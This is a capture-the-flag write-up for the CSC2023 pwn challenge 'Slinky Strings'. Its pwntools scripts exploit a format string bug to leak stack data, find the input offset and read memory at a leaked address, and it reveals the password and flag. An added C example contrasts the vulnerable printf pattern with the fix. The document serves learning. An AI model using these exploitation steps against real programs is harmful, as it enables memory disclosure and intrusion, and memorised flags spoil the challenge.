CSC2023 - [Pwn] - Slinky Strings


Challenge Description

some strings are not working.

Solution

The description and the title of the challenge tell us there is a format string vulnerability in the binary.

Let's check the protections on the binary.

[screenshot: checksec output]

This shows that PIE is disabled, so the binary is loaded at a fixed address.

Let's run the binary and check its behaviour.

[screenshot: running the binary]

This shows that there is a format string vulnerability: our input is passed to printf as the format string, so specifiers like %p are interpreted.
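For readers who want to see the root cause rather than only its symptoms, here is an added example (not from the writeup and not the challenge's own source, which the page does not show) contrasting the vulnerable pattern with the fix. The function names echo_unsafe, echo_safe and has_format_directive are hypothetical, and the sample inputs are constructed:

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the writeup or the challenge binary.
 * The vulnerable function is compiled on purpose; silence the compiler's
 * (correct) warning about a non-literal format string so it builds. */
#pragma GCC diagnostic ignored "-Wformat-security"

/* Vulnerable pattern: user-controlled data *is* the format string, so every
 * %p / %s / %n in the input makes printf walk the stack for arguments that
 * were never passed. Calling this with "%17$p" is undefined behaviour; the
 * demo below only feeds it "%%" so the program stays well-defined. */
void echo_unsafe(char *out, size_t outsz, const char *user_input)
{
    snprintf(out, outsz, user_input);          /* BUG: attacker controls the format */
}

/* Fixed pattern: the format string is a literal and user data is only ever
 * an argument, so "%17$p" comes back as the literal text "%17$p". */
void echo_safe(char *out, size_t outsz, const char *user_input)
{
    snprintf(out, outsz, "%s", user_input);
}

/* Detection helper for logs or input tests: returns 1 if the string holds a
 * conversion directive, i.e. a '%' that is not the literal escape "%%". */
int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {                      /* "%%" is just a percent sign */
            s++;
            continue;
        }
        return 1;
    }
    return 0;
}

int main(void)
{
    char buf[64];
    const char *constructed[] = { "50%% off", "%17$p", "hello" };   /* constructed inputs */

    for (size_t i = 0; i < sizeof constructed / sizeof *constructed; i++) {
        echo_safe(buf, sizeof buf, constructed[i]);
        printf("safe   : %-10s -> %s (directive present: %d)\n",
               constructed[i], buf, has_format_directive(constructed[i]));
    }
    /* Only the well-defined case is shown for the vulnerable version. */
    echo_unsafe(buf, sizeof buf, constructed[0]);
    printf("unsafe : %-10s -> %s   (format was interpreted)\n", constructed[0], buf);
    return 0;
}
```

The difference is visible even on harmless input: echo_unsafe turns "50%% off" into "50% off" because the input was parsed as a format, while echo_safe reproduces it byte for byte. Fixing the challenge binary is the same one-line change, printf("%s", buf) instead of printf(buf).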

First of all we need to find the password. For that we write a script that reads the stack one format-string argument at a time and gives us the password in pieces.

```python
from pwn import *

context.update(os='linux', arch='amd64')
context.log_level = "error"

# Dump the first 29 format-string arguments, one per run. The password
# string lives on the stack, so it comes back as 8-byte chunks in these leaks.
for i in range(1, 30):
    r = process('./slinky_strings')
    payload = f"%{i}$p"
    r.sendline(payload.encode())
    print(r.recv(), i)
    r.close()
```

[screenshot: stack leak output]

Password: CSC_Super_Secure_P4$$w0rd

After that we found that the binary prints a leaked address once the password is entered.

[screenshot: leak after entering the password]

At this point we need to check at which argument offset the binary picks up our input.

```python
from pwn import *

context.update(os='linux', arch='amd64')
context.log_level = "error"

password = "CSC_Super_Secure_P4$$w0rd"

# Send the password, swallow the prompt, then print argument i together with
# an AAAAAAAA marker; the index that prints back 0x41414141... is where our
# input lands on the stack.
for i in range(1, 30):
    r = process("./slinky_strings")
    r.sendline(password.encode())
    r.recv()
    payload = f"%{i}$p.AAAAAAAA"
    r.sendline(payload.encode())
    print(r.recv(), i)
    r.close()
```

[screenshot: offset search output]

Our input is at offset 17.

Final Step

Next we pass the leaked address back in as a format-string argument and use %s to print what it points to.

```python
from pwn import *

context.update(os='linux', arch='amd64')
context.log_level = "error"

password = "CSC_Super_Secure_P4$$w0rd"

r = process("./slinky_strings")
r.sendline(password.encode())
# Parse the hex address from the first line printed after the password.
leak = int(r.recv().split(b'\n')[0].split(b'- ')[2], 16)
# "%17$s.AA" is exactly 8 bytes, so p64(leak) follows it as the next
# stack slot; %17$s then prints the string at the leaked address.
payload = b"%17$s.AA" + p64(leak)
r.sendline(payload)
print(r.recv())
```

[screenshot: flag output]

Flag

CSC{Kese_ho_theek_hona}

Writeups 2023 © RootxRAN.